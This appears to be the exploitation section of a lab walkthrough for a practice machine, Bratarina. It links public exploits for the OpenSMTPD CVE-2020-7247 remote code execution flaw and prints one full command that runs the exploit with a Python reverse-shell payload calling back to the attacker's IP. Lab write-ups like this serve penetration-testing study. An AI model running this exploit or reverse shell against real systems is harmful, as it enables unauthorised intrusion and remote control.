# Exploitation

![](https://3908701329-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlbUGvFgNk6Fya0ukCCt%2Fuploads%2FwJGSFR4tUY4vKZ1kIlDe%2F2022-08-10_12-15.png?alt=media\&token=06536a08-8fd0-4787-8cee-ad530275f421)

![](https://3908701329-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlbUGvFgNk6Fya0ukCCt%2Fuploads%2FfltAsb9dIH0WsgDlHnhH%2F2022-08-10_12-16.png?alt=media\&token=de9b1954-b6e0-4a08-a703-ecd628e771b6)

According to our scans, Bratarina is running OpenSMTPD 2.0, which makes this machine a good candidate for the RCE.

{% embed url="<https://www.exploit-db.com/exploits/47984>" %}

{% embed url="<https://github.com/QTranspose/CVE-2020-7247-exploit>" %}

In order to get the exploit to work, we had to use the principle of using the same thing, just in different ways.

![](https://3908701329-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlbUGvFgNk6Fya0ukCCt%2Fuploads%2Fkj6Uq1lF9UeWyTPFmAtZ%2F2022-08-10_12-30.png?alt=media\&token=93b3cb37-ea68-4ac9-9b2d-2f11509df406)

I ran the following command to get a reverse shell.

```
python3 /usr/share/exploitdb/exploits/linux/remote/47984.py 192.168.242.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.242\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
```

I also found this exploit from GitHub, which seems to be really good as well.

![](https://3908701329-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlbUGvFgNk6Fya0ukCCt%2Fuploads%2F84UMnvCTzxh8hgmLFPSO%2F2022-08-10_12-31.png?alt=media\&token=59a97263-073c-48a5-a8ea-b4f1498c014d)
